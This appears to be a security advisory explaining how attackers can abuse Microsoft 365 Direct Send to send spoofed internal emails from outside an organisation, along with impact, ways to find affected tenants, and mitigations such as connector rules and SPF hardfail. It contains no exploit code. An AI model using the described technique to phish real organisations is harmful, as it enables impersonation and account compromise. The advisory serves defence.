This vector abuses Microsoft Direct Send service in order to propagate phishing emails from an external sender to an internal user, whilst spoofing the properties of a valid internal user. This “feature” has existed since before 2016. However, threat intelligence available to JUMPSEC has only observed it being abused recently.
Abuse Primitives
As part of the research conducted by JUMPSEC and other organisations, this “feature” can be abused to spoof emails inside an organisation externally. This means that without needing access to the network, an attacker can send emails between internal users by spoofing the sender address and they will appear to be from the spoofed user. The caveats to doing so require the organisation to be using an external mail proxy provider such as Mimecast.
Organisations that consume Microsoft 365 for Exchange Online service will automatically be registered with an MX record (Company-tld.mail.protection.outlook.com). This server can be used as a SMTP server to send mail inside an organisation to valid users.
Am I Affected?
As part of an ongoing effort, JUMPSEC has built the following service that allows organisations to check whether they are affected and if their implemented controls will fix the issue:
Visiting the following URL and following the instructions.
Impact
The technique grants the ability to send emails as trusted users within an organisation. Additionally, spoofing / controlling the sender address can lead to more sophisticated phishing attacks. The population of the users properties within M365 including photos and Teams information increases the quality of the phish by luring victims into believing this is a genuine email / user from within the organisation. Generally speaking, without more granular preventative controls, this could lead to compromise of accounts, assets and resources.
JUMPSEC expects threat groups to be using this technique to target affected organisations. As affected organisations can be determined via a simple dig issuance, it’s trivial to determine likely affected organisations. Additionally, users of said organisations can be enumerated via previous breaches and additionally by performing targeted open source intelligence gathering.
Mitigations
Direct Send cannot be disabled. The best mitigatory steps if you are using an external mail proxy, would be to force all internal and external mail flows through that mail gateway proxy. Emails should not be allowed into the organisation from untrusted sources.
Generally, enforcing “SPF hardfail” within Exchange Online Protection (EOP) will add an extra layer of protection and should be enabled where possible.
Additional Controls can be enabled via Exchange Admin Center using connector rules, these rules allow bespoke configuration for when you need to route mail differently. The Exchange Admin Center connector rules can be configured to force all incoming mail to the organisation through your mail proxies. Mail should not be allowed into the organisation from an untrusted source. Inbound connectors accept email messages from remote domains that require specific configuration options.
The below is the response from when an connector has been configured to only allow traffic from a specific IP address:
550 5.7.51 TenantInboundAttribution; There is a partner connector configured that matched the message's recipient domain
. The connector had either the RestrictDomainsToIPAddresses or RestrictDomainsToCertificate set [XXXX] (Net::SMTPFatalError)